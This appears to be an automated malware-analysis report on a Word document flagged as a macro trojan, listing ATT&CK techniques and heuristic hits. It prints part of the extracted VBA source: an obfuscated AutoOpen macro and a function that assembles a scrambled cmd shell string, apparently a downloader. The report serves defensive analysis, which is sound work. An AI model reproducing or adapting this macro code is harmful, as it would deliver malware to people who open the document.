Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
A critical OLE_VBA_SHELL heuristic fired on this sample, indicating a Shell() call within its VBA macros. An AutoOpen macro is present and likely executes obfuscated code when the document is opened. Together these suggest the document is designed to download and execute a secondary payload upon opening.
Heuristics (6)

- ClamAV: Doc.Trojan.Agent-6922916-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-6922916-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67959 bytes | 88ba5e3221ef0a032eed3a218a3af806a55afc50092f31b234d8e7c7840f9333 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "kIHBiwwJLtrfRp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim timCzM(1)
timCzM(0) = MidB(cTBmzJ + EYkAWzmhdmYKHlUlMhJ + iMCwa, 229, 103) + MidB(kBsHO + vEmVZbNUNkfYKQvRKvqHEY + ZFsjmB, 780, 325)
Dim dqSoa(2)
dqSoa(0) = Right(mPuvDJTW + dQNYbqlZcEOuTaLzn + jUzji, 484) + Mid(zfdjvLkh + bCANmVJukjIVbhsa + RJmdY, 719, 220)
dqSoa(1) = MidB(isJrMiBV + OVfsDqQNUdrzJtNk + JSEBqzh, 5, 837) + MidB(KBilm + mSUwVLrzsClnkUCaqNr + VuRjFf, 268, 447)
Dim PwwFr(1)
PwwFr(0) = MidB(mBVHF + dGQVqmiVnwUbjIS + JjEuNuU, 377, 367) + MidB(wkRIw + RZOjcGMaiKpwiuzB + voSPv, 634, 47) + Mid(MdOEAjQ + wnBUlBNRzBzwvVl + hbERpV, 639, 59) + Right(SSQtFiGb + OiPEtBfQJfvVUiki + wEdfiGQ, 844)
Dim BiHwh(1)
BiHwh(0) = Mid(bavwU + izIBFziwLnPqhjtmZzuK + cudwXR, 98, 7) + MidB(psnLf + awLSWdwLFhjrzncDFwkt + pfIkwh, 135, 704)
Dim NzvFO(2)
NzvFO(0) = Left(LLXTJ + vzjcjqCcDhMPXavw + zsWpFz, 485) + MidB(ujNGp + iBpcLWrYfpvowYczGMn + RURIA, 751, 277) + MidB(YwuGoO + zbaIdOWTNdrqmjLqFjY + SdPAdG, 217, 279) + MidB(OLDAn + ljZkfmEXZdXVBJqAiO + CPUjXf, 365, 621)
NzvFO(1) = Left(CzrAfm + vFjhrBoKuKnvosTKsPZEt + SUiAd, 70) + Right(TnhUX + hVYVjVOEdKbINWbkiUHJQ + tVFlCzrz, 644) + Left(XWlEPJW + rpwlvtnZaMIPvcmbMkKfTV + ziEzm, 945) + MidB(DYTqIKGX + XIaILQWvrjJdQnGVdaKkz + fwSCdm, 474, 545)
Dim jkOawd(2)
jkOawd(0) = Right(OXmjZMr + uAPGKvRzICiDGzqFBzIYTu + IVnHt, 603) + Right(uTrYozoz + vLQmRalOimbwlJQLAID + EuHSR, 85) + Left(DFzVt + MmIRLSXfvCnUFsCE + TDTJZi, 470) + MidB(HsnMz + lzDlXbWOlVjzHThsioHmdu + nKzLnG, 120, 117)
jkOawd(1) = MidB(wzsjF + JprFoDAifLiKaJjERZhct + nriACj, 282, 973) + MidB(pMwHz + avbvaEIzBbObMwPJvGdbP + mBwkw, 346, 850)
Dim EGksG(2)
EGksG(0) = Mid(IzzURmS + ktZjwVWDVVTwcQDMUZK + lCObGL, 833, 748) + Right(mZTFVijh + OSMMWsAGBMaTIuvwsdi + BCJKh, 566)
EGksG(1) = MidB(VpBSpCFO + jLiLGKZbolfMLLT + AdQVEdHc, 127, 89) + MidB(iUCuSpw + IBwGaiWGrlfUIDvcDiSX + MmdSs, 419, 451)
Dim sbTPiv(2)
sbTPiv(0) = MidB(cNEDOM + GhUuRpiwNvsomuiPbcz + SNqKtzw, 491, 586) + Mid(nDpYDwU + ArhqrrkzWVJcDwUFEOW + zhKFFM, 599, 157)
sbTPiv(1) = MidB(jafAS + OcHzdjPNEcPHCiqJjDi + NXsHBYzB, 59, 252) + MidB(GWWwuskH + dJCzSKIVkqPkFqILaMuCk + TLmLudoU, 892, 685) + Left(FnshZ + rmRImnAcjiGSrzjcpNb + GDHrT, 645) + MidB(mhfDBC + GdMoMcncwvwwapGCjYwh + MUluZ, 799, 909)
Dim FJjjh(1)
FJjjh(0) = Left(WzShB + ZAjHzArdEudjRMcEvpXuvL + omukCzvo, 977) + MidB(Cjfcn + EGuKzdEzGBFlvXKbTrjkdNM + UQMkPGH, 377, 912) + MidB(QfFVpmt + iYclLzYVRzicLtRqio + ZELnlK, 898, 810) + Left(jvvoa + JjzijbBdKvVCXJDjzXLO + cdFijXT, 857)
fODaImlw (KeyString(vSLzsJEz + GlbqPZjM + 7 + 18 + 42 + utDcbu + TiiJJnY) + FhjJsiSP + pqFiLBJD + KeyString(jVwwXf + wcoSuj + 8 + 21 + 48 + tMCKlMR + qNzTIz) + iWbchjz + KBbbwAh + pkVTcz + vSIwD + zClOiPh + GjaFAOVC + ZSMmZREi + ssrIXrp)
Dim iaivW(1)
iaivW(0) = MidB(ivwOdVKn + MbqLivNdmBjXYRnAdH + qkFNjhz, 12, 211) + MidB(iLpswiUi + puYazFEXAIfzAadfjmqzcu + YrWIYok, 23, 806)
Dim jcscYl(1)
jcscYl(0) = Left(OpRSzoDM + wwfwXfjQjqNzkwtzJSMpvosH + UVcdCt, 701) + Right(FNwHtDI + jVDoAZzfHkIiYHrOkwrMm + aMLSlnoC, 508) + Right(jUCfXJ + baooPWtQtpJRYDURVzTbw + ruLFYi, 671) + Mid(WlYvwwtY + tEHQDuDHaIzqjtiKUGaCkh + YVZDv, 358, 247)
Dim zTLjVS(1)
zTLjVS(0) = MidB(NEJWbKz + CXVoYdbMtKoMEZFiNi + SiricO, 328, 662) + Mid(OpSPlYa + IYwwAhPCEVRaLKhPAM + TLwPK, 822, 760)
End Sub
Attribute VB_Name = "jdHKVrbof"
Function iWbchjz()
McpqXcN = "d / \ \\/\/ //" + " \ \ /V:/C" + """" + "set `}'" + "=a207 02a7 270a " + "a720 720a 72a0 0a7" + "2 7a02 a207 a072 " + "027a 027a "
SHzoF = "270a 2a07 02a7 027" + "a 0a72 a270}20a7}" + "270a{270ah270a" + "ca207t702aaa" + "720c270a}0a27;02a" + "7ka270aa702ea0"
zsrNij = "27r07a2b720a;70" + "2aCa270q20a7p7a2" + "0$a072 207ama02" + "7e0a72t72a0I"
iWbchjz = McpqXcN + SHzoF + zsrNij
Dim KOzsq(2)
KOzsq(0) = Mid(zucDNrTn + jtXfXqTfSkiiQWVYA + tLabrJ, 223, 38
... (truncated)